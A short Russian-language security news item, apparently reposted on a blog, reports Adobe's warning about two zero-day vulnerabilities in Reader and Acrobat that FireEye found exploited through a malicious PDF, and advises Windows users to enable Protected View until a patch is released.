В своем очередном уведомлении разработчики Adobe предупреждают пользователей о том, что в таких продуктах компании, как Reader и Acrobat (предназначены для работы с PDF-файлами) содержатся две уязвимости нулевого дня. Эксперты подчеркивают, что пользователи уязвимых решений версии 11.х для Windows могут обезопасить себя, включив функцию защищенного просмотра.

При ее активации открываемые PDF-файлы будут запускаться в песочнице. Кроме того, пользователи могут установить альтернативные программы для работы с этими документами. Для активации функции необходимо зайти в меню File > Edit > Preferences > Security (Enhanced) и выбрать опцию Protected View.

Напомним, данные бреши были обнаружены благодаря усилиям исследователей из FireEye, обнаружившим вредоносный PDF-документ, эксплуатирующий ранее неизвестную уязвимость в программах.

Указанный файл, как впоследствии выяснилось, при попытке его открыть внедряет вредоносный код на систему, используя две бреши в программах Adobe. По данным экспертов компании, уязвимыми являются последняя версия Reader, а также последняя версия Acrobat для Windows и Mac OS X. Соответствующее обновление безопасности в настоящий момент находится в стадии разработки.

http://www.bezpeka.com/ru/news/2013/02/15/Adobe-Reader-flaws.html

Усі новини http://fireku.narod2.ru/novini_t/

Метки: windows, Mac OS X, Adobe, PDF, уязвимость
Мы — это то, что мы публикуем
Загружайте фото, видео, комментируйте.
Находите друзей и делитесь своими эмоциями.
Присоединяйтесь
RSS Андрій Крупко
Войти